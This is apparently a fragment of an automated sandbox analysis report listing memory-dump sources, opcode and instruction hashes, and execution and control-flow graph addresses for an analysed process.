                                                                                                                                  • Opcode Fuzzy Hash: 9607bfc2a5c3f4b5f0e884544b91f60e0d10ff00969fbc98f7efdaf10b1cfa4b
                                                                                                                                  • Instruction Fuzzy Hash: 8901D62AB0E5550AD324B27C7CA68E53B50CFA523F70803F7E24DCE5A7DC08904A87D4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f99356922026e6e880ee7a92bad2d9d45a1a3b36c901df894e745226f9e58d5a
                                                                                                                                  • Instruction ID: 2fd90356b865a35136ea2973926417c0e99dfe7ab35acf3027c41e9a90ee891d
                                                                                                                                  • Opcode Fuzzy Hash: f99356922026e6e880ee7a92bad2d9d45a1a3b36c901df894e745226f9e58d5a
                                                                                                                                  • Instruction Fuzzy Hash: 8611A136A0E28D8FE722DFA888601DD7FB1EF42711F0645F7D048DB1A2D97466498764
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5651ca33e8d611be5e8cec21b06c4301865ff00d904338416f7df549bf7627ce
                                                                                                                                  • Instruction ID: 43663595fb94e75edc4dd87c1a9fae584f9d7f44b9ab6841a64d05736580f70d
                                                                                                                                  • Opcode Fuzzy Hash: 5651ca33e8d611be5e8cec21b06c4301865ff00d904338416f7df549bf7627ce
                                                                                                                                  • Instruction Fuzzy Hash: B8019232B1DA0A4BEB68DB58C4697A9B3D2FBD4310F164379D04EC72D5DE78B9818780
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 19def9a7db69bd2fea9d3a6f34a674aeb9b5588d97fe56784f45aa7666b38d07
                                                                                                                                  • Instruction ID: b0e6e3081be496f910f8c97b66204c98f67917dff3c7a24cf36e577077c1fdb6
                                                                                                                                  • Opcode Fuzzy Hash: 19def9a7db69bd2fea9d3a6f34a674aeb9b5588d97fe56784f45aa7666b38d07
                                                                                                                                  • Instruction Fuzzy Hash: B7015232F0542E4AEF64E79898653FD73E1EFE8311F064A76E009D7195DA68AA818780
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2a26a3ebc4bc9e74145091e1032dcb3bb35e2874727d4901efe39f9149ec395b
                                                                                                                                  • Instruction ID: 29b7ff40235aed8ed58873bd8658f74a1c50275defc08408daf90b1810143e1e
                                                                                                                                  • Opcode Fuzzy Hash: 2a26a3ebc4bc9e74145091e1032dcb3bb35e2874727d4901efe39f9149ec395b
                                                                                                                                  • Instruction Fuzzy Hash: B4019235A0E38D9FE721DFA4C85049CBFB1EF02710F1641E7D048DB1A2D9746645C754
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7332ddb06a322b94d9d1a086d782e2bd0ebfe3b8b6f5b591155510d7e2697513
                                                                                                                                  • Instruction ID: 3cddbe00afb4ff431c128674d65695716683e5987107ee65f5c6ba0062407818
                                                                                                                                  • Opcode Fuzzy Hash: 7332ddb06a322b94d9d1a086d782e2bd0ebfe3b8b6f5b591155510d7e2697513
                                                                                                                                  • Instruction Fuzzy Hash: 4201BC31A0E38D9FEB21DFA488A049CBFB1AF02700F1542E7D048CB2A3D9786A448754
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b0bc7bd19de957c656d4c1f70f952c63534e99dc7521a0c93103d3ec3a457ce7
                                                                                                                                  • Instruction ID: a062485ef70691557f72edf6e6b1847a2b5b20afc9384f58c100db5ba6bdc7be
                                                                                                                                  • Opcode Fuzzy Hash: b0bc7bd19de957c656d4c1f70f952c63534e99dc7521a0c93103d3ec3a457ce7
                                                                                                                                  • Instruction Fuzzy Hash: 7DF0342260E7C50FD31B173888754943FB0DE6316134A01E7C081CF1B3D85D888A8352
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d89311434c9708ba25c6d473b2a50db4ece3f4970cc5127e1b5a28fbf1ec18f8
                                                                                                                                  • Instruction ID: aad96e1d7d97b683b76d1842787eed33bcf2f0f51b8489067d4b27900bf4e650
                                                                                                                                  • Opcode Fuzzy Hash: d89311434c9708ba25c6d473b2a50db4ece3f4970cc5127e1b5a28fbf1ec18f8
                                                                                                                                  • Instruction Fuzzy Hash: 88F0A03925EA49CFC742EB3DC8A58C4BB60FF02204B8A01FAD089CB5A2D3155C5ECB51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7b9d412235b02f3ebd63d2442816699b17ae80a3b16eb22797111223da92205b
                                                                                                                                  • Instruction ID: 5e7126f05cbdf4881c45ee340200cc1299084b3014dcb6f040ca477b80de1229
                                                                                                                                  • Opcode Fuzzy Hash: 7b9d412235b02f3ebd63d2442816699b17ae80a3b16eb22797111223da92205b
                                                                                                                                  • Instruction Fuzzy Hash: 6BF0E521B1DBC80FC769962D5866161BFF1DB9B20134A02EFC186CB6A3DD59AC898341
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bac3000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                                                                  • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                                  • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c6f8a706cbd772b155944279ffe8a3f2cffa48fa2b7bee167bf78b64a5f12c82
                                                                                                                                  • Instruction ID: b32eab7c9bc4b7e74645761e53194022764afd2861dcc3217c0a303523c631e1
                                                                                                                                  • Opcode Fuzzy Hash: c6f8a706cbd772b155944279ffe8a3f2cffa48fa2b7bee167bf78b64a5f12c82
                                                                                                                                  • Instruction Fuzzy Hash: 07D02230B508040FCB0CA738885C8303390EBAA20278600A8D00AC73B1D96ADC88CB80
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1e116b91c9d63e8cb3e7de1cd9288fd58b425d35437b3874e7b0b5ea6d6322c4
                                                                                                                                  • Instruction ID: 15b43eca4ff2acd1d2eced378d129677e904d30cf21e5492986ab00f519a9323
                                                                                                                                  • Opcode Fuzzy Hash: 1e116b91c9d63e8cb3e7de1cd9288fd58b425d35437b3874e7b0b5ea6d6322c4
                                                                                                                                  • Instruction Fuzzy Hash: 77D01234B619044FC71CB738885987473A1EBAA216B9541A9D00AC72B1D96ADD89C741
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bab0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c405b05fdfbe4165b7a88bdd7db18eba14fa53fee58ea56b6795c1e173da9a0a
                                                                                                                                  • Instruction ID: 7bedebf16a930345efff0237c223a80bd3713e8a3c91020b9832b69c416a0a52
                                                                                                                                  • Opcode Fuzzy Hash: c405b05fdfbe4165b7a88bdd7db18eba14fa53fee58ea56b6795c1e173da9a0a
                                                                                                                                  • Instruction Fuzzy Hash: 56E08C32E0440E4BEB18EF94C461AFD3BB1AF48304F40013AE029E62E5DFB428818B01
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bab0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d34d9375b611b996318a395ba4af66737237af83ea357c991f98737d4e71250a
                                                                                                                                  • Instruction ID: 693cc6325eff473f90e08535aeacc7b152b97be437aed018cb3775b3459b9de1
                                                                                                                                  • Opcode Fuzzy Hash: d34d9375b611b996318a395ba4af66737237af83ea357c991f98737d4e71250a
                                                                                                                                  • Instruction Fuzzy Hash: DDD0A730F0881F4BE659EF48946426A6251FF44300F120039D81DC3167DE34E9118A40
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0f4f05a223ffb7b3a8a748953fa134ab67674250fd60c56fd708e36b549a1ad9
                                                                                                                                  • Instruction ID: 39ae7c3307a973fb3895cf3b728150e803e3f5b97c6d35a82a3f5e8e7e55929d
                                                                                                                                  • Opcode Fuzzy Hash: 0f4f05a223ffb7b3a8a748953fa134ab67674250fd60c56fd708e36b549a1ad9
                                                                                                                                  • Instruction Fuzzy Hash: 7FC04C305218098FC994E76DC98595477A0FB0D215BD60190E44DC7171E65AADD5C741
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2412635f2e828563d32fe7f20a8f0098534477af7fc25eb0cb89cbd3628c561b
                                                                                                                                  • Instruction ID: 15a2d76f2acc1e229c8467994c8db05a7fe7b6cb91a23be4982a98db52c93475
                                                                                                                                  • Opcode Fuzzy Hash: 2412635f2e828563d32fe7f20a8f0098534477af7fc25eb0cb89cbd3628c561b
                                                                                                                                  • Instruction Fuzzy Hash: 5BC08C3051180D8FCA48EB28C88481433E0FB0D200FC20090E008C7170E269DCC0CB40
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bac3000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6d37d5abdadc2e2e799eb191ad3f1425ddb310326d155c93511a588fff0db703
                                                                                                                                  • Instruction ID: bdd98c863e0162ae75f8e14699de8453af00b9b37c7f4702c9b7186f81107286
                                                                                                                                  • Opcode Fuzzy Hash: 6d37d5abdadc2e2e799eb191ad3f1425ddb310326d155c93511a588fff0db703
                                                                                                                                  • Instruction Fuzzy Hash: 64C092306118088FCA44FB7DC88994037E0FB0E205BC50080E40CCB270E26A9C96CB41
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c349dc12a499adf949896fc33ec4b30e8c824b35018b78ca43193ab54f3753cf
                                                                                                                                  • Instruction ID: 4ca7060295ed86bba127f4d5102b666ca9ffd9497285361174d5cd56f8599d01
                                                                                                                                  • Opcode Fuzzy Hash: c349dc12a499adf949896fc33ec4b30e8c824b35018b78ca43193ab54f3753cf
                                                                                                                                  • Instruction Fuzzy Hash: A3C08C01F0C85A12F21922040422A7D04024F4471CFC80034F00EC72CECF5C5A0242C6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4c899b50f76bdc8ca6145acde5f31984b735bdcc3b09d9e8938d1509e74ff910
                                                                                                                                  • Instruction ID: ed2ad82ac794e93c54508d1dd081e88639fcab4bd9146968243794078dba2c1c
                                                                                                                                  • Opcode Fuzzy Hash: 4c899b50f76bdc8ca6145acde5f31984b735bdcc3b09d9e8938d1509e74ff910
                                                                                                                                  • Instruction Fuzzy Hash: 2BB01200D5740F00E47433FA08A206870415B44200FC20070D40C8019198CE22980277
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bab0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c4335748156f765de31ba137da35eda4b86e70c92f16d18bbbf842374232bb6d
                                                                                                                                  • Instruction ID: e3ef123d9a2e456fd85f6baed8a656f05d0499f799ba2a21d6a2caedea0dda8f
                                                                                                                                  • Opcode Fuzzy Hash: c4335748156f765de31ba137da35eda4b86e70c92f16d18bbbf842374232bb6d
                                                                                                                                  • Instruction Fuzzy Hash: E4B09224A0911A8BE7209B8084303AA22429B44310F224431A82D832DBDBA8A90086A1

Execution Graph

Execution Coverage: 3%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 5
Total number of Limit Nodes: 0
execution_graph 34703 7ffd9bb150a1 34706 7ffd9bb139a0 34703->34706 34705 7ffd9bb150cd 34707 7ffd9bb139a9 CreateFileTransactedW 34706->34707 34709 7ffd9bb17d3a 34707->34709 34709->34705

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 21 7ffd9bc31853-7ffd9bc31894 25 7ffd9bc31896 21->25 26 7ffd9bc318a1-7ffd9bc32701 25->26 180 7ffd9bc3277f-7ffd9bc329a1 26->180 181 7ffd9bc32701 26->181 201 7ffd9bc329a6-7ffd9bc32a1c 180->201 181->180 205 7ffd9bc32a1d 201->205 205->205 206 7ffd9bc32a1f-7ffd9bc32a22 205->206 206->201 207 7ffd9bc32a24-7ffd9bc32aaa 206->207 216 7ffd9bc32aaf-7ffd9bc32b25 207->216 220 7ffd9bc32b26 216->220 220->220 221 7ffd9bc32b28-7ffd9bc32b2b 220->221 221->216 222 7ffd9bc32b2d-7ffd9bc32cbc 221->222 242 7ffd9bc32cc1-7ffd9bc32d37 222->242 248 7ffd9bc32d38 242->248 248->248 249 7ffd9bc32d3a-7ffd9bc32d3d 248->249 249->242 250 7ffd9bc32d3f-7ffd9bc32d90 249->250
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2953734608.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bc30000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $
                                                                                                                                  • API String ID: 0-3993045852
                                                                                                                                  • Opcode ID: df4e2930f8d5d0999a86536d8567d0b79b774a7f3718899790011658c67b247a
                                                                                                                                  • Instruction ID: cf8984d54fc2edd223ff7b050d2047c4c01b9f2e35a64af14e06740e7118d59b
                                                                                                                                  • Opcode Fuzzy Hash: df4e2930f8d5d0999a86536d8567d0b79b774a7f3718899790011658c67b247a
                                                                                                                                  • Instruction Fuzzy Hash: 54D29270A1DA5D4FDFA8DB58C8A5EA4B7E1FF68750F4441E9E05CD7292CA34B980CB02
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2949988761.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bae0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3a4951b735ace051eab122f43da12ecd0e16ed6e13c117ed7bef335f9148c256
                                                                                                                                  • Instruction ID: 0e642f0a9c389d69d752b9e707480231c3e7a2c23295174c5f85b483d419efb0
                                                                                                                                  • Opcode Fuzzy Hash: 3a4951b735ace051eab122f43da12ecd0e16ed6e13c117ed7bef335f9148c256
                                                                                                                                  • Instruction Fuzzy Hash: CFE2D431B1991E4FEBA8EB6884A17B873D2FFA8340F0546B9D44DC72E6DE64BD418740
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2957345490.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2949988761.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2949988761.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                  • String ID: c9$!k9$"s9

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2949988761.00007FFD9BB02000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB02000, based on PE: false
                                                                                                                                  • String ID: @

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2953734608.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false
                                                                                                                                  • String ID: $

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 892 7ffd9bb13990-7ffd9bb17cb2 898 7ffd9bb17cb4-7ffd9bb17cb9 892->898 899 7ffd9bb17cbc-7ffd9bb17d38 CreateFileTransactedW 892->899 898->899 900 7ffd9bb17d40-7ffd9bb17d6a 899->900 901 7ffd9bb17d3a 899->901 901->900
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2949988761.00007FFD9BB02000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB02000, based on PE: false

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 903 7ffd9bb139a0-7ffd9bb17cb2 908 7ffd9bb17cb4-7ffd9bb17cb9 903->908 909 7ffd9bb17cbc-7ffd9bb17d38 CreateFileTransactedW 903->909 908->909 910 7ffd9bb17d40-7ffd9bb17d6a 909->910 911 7ffd9bb17d3a 909->911 911->910
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2949988761.00007FFD9BB02000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB02000, based on PE: false

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2957345490.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2957345490.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2949988761.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false
                                                                                                                                  • String ID: M
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2949988761.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false
                                                                                                                                  • String ID: I
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2949988761.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9baf3000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: I
                                                                                                                                  • API String ID: 0-3707901625
                                                                                                                                  • Opcode ID: 8c6a4fdce00041ebd4391893b12501e3b221cfcef03c37ec6b9b962d6311d25f
                                                                                                                                  • Instruction ID: 18810488a757b8b08116a3e883db7c51dd8dc65599a559135fcde6d5b3d4ed7d
                                                                                                                                  • Opcode Fuzzy Hash: 8c6a4fdce00041ebd4391893b12501e3b221cfcef03c37ec6b9b962d6311d25f
                                                                                                                                  • Instruction Fuzzy Hash: C0E0E56194E7C44FCB16EB7588AA9547FA0AE6721178A40EEC189CB1B3E6298949C701
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2949988761.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bae0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 06daad4cb8988aa83c5b4c45b5b73a8b53f9b62350327b846b06686734faf8e7
                                                                                                                                  • Instruction ID: e2e8082c7022280ab2cdec3724852e3b9139526a779f4d7e816ccd86aa2d400a
                                                                                                                                  • Opcode Fuzzy Hash: 06daad4cb8988aa83c5b4c45b5b73a8b53f9b62350327b846b06686734faf8e7
                                                                                                                                  • Instruction Fuzzy Hash: AB42C031B0991E4FEBA8EB5884A17B473D2FFA8350F0542B9D44DC72D7DE68AD428781
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2957345490.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bec0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 24f04288fc8015acc17a152d4ac12979c64d73400c9be5141d2c81da7ff1f9c1
                                                                                                                                  • Instruction ID: 6723d7562eaa649bb1706c3519f0d8f104bd8cddc7b709e642cfb3eb826c59b8
                                                                                                                                  • Opcode Fuzzy Hash: 24f04288fc8015acc17a152d4ac12979c64d73400c9be5141d2c81da7ff1f9c1
